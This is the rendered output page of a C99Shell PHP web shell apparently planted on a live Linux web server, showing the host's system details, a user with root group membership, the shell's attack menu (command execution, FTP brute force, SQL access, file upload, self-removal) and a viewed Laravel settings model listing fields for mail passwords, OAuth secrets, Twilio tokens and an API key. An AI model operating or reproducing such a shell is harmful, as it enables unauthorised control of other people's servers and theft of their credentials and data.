!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/game.picotech.app/public_html/core/app/Models/   drwxr-xr-x
Free 29.37 GB of 117.98 GB (24.89%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Setting.php (3.08 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace App\Models;

use 
Illuminate\Database\Eloquent\Model;

class 
Setting extends Model
{
    protected 
$fillable = [
        
'title',
        
'home_page_title',
        
'logo',
        
'favicon',
        
'loader',
        
'is_loader',
        
'feature_image',
        
'primary_color',
        
'smtp_check',
        
'email_host',
        
'email_port',
        
'email_encryption',
        
'email_user',
        
'email_pass',
        
'email_from',
        
'email_from_name',
        
'contact_email',
        
'version',
        
'google_analytics_id',
        
'meta_keywords',
        
'meta_description',
        
'is_shop',
        
'is_blog',
        
'is_faq',
        
'is_contact',
        
'facebook_check',
        
'facebook_client_id',
        
'facebook_client_secret',
        
'facebook_redirect',
        
'google_check',
        
'google_client_id',
        
'google_client_secret',
        
'google_redirect',
        
'min_price',
        
'max_price',
        
'view_product',
        
'is_attribute_search',
        
'is_range_search',
        
'footer_phone',
        
'footer_address',
        
'footer_email',
        
'footer_gateway_img',
        
'social_link',
        
'friday_start',
        
'friday_end',
        
'satureday_start',
        
'satureday_end',
        
'copy_right',
        
'is_slider',
        
'is_category',
        
'is_product',
        
'is_top_banner',
        
'is_recent',
        
'is_top',
        
'is_best',
        
'is_flash',
        
'is_brand',
        
'is_blogs',
        
'is_campaign',
        
'is_brands',
        
'is_bottom_banner',
        
'is_service',
        
'campaign_title',
        
'campaign_end_date',
        
'campaign_status',
        
'twilio_sid',
        
'twilio_token',
        
'twilio_form_number',
        
'twilio_country_code',
        
'is_twilio',
        
'twilio_section',
        
'is_announcement',
        
'announcement',
        
'announcement_delay',
        
'is_maintainance',
        
'maintainance_image',
        
'maintainance_text',
        
'is_three_c_b_first',
        
'is_popular_category',
        
'is_section_track',
        
'is_three_c_b_second',
        
'is_featured_category',
        
'is_highlighted',
        
'is_two_column_category',
        
'is_popular_brand',
        
'is_two_c_b',
        
'theme',
        
'recaptcha',
        
'google_recaptcha_secret_key',
        
'google_recaptcha_site_key',
        
'currency_direction',
        
'google_analytics',
        
'google_adsense',
        
'facebook_pixel',
        
'facebook_messenger',
        
'is_google_analytics',
        
'is_google_adsense',
        
'is_facebook_pixel',
        
'is_facebook_messenger',
        
'announcement_link',
        
'is_privacy_trams',
        
'policy_link',
        
'terms_link',
        
'is_guest_checkout',
        
'custom_css',
        
'announcement_type',
        
'announcement_title',
        
'announcement_details',
        
'disqus',
        
'is_disqus',
        
'is_cookie',
        
'cookie_text',
        
'decimal_separator',
        
'thousand_separator',
        
'is_decimal',
        
'order_mail',
        
'ticket_mail',
        
'api_key'
    
];

    public 
$timestamps false;


}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--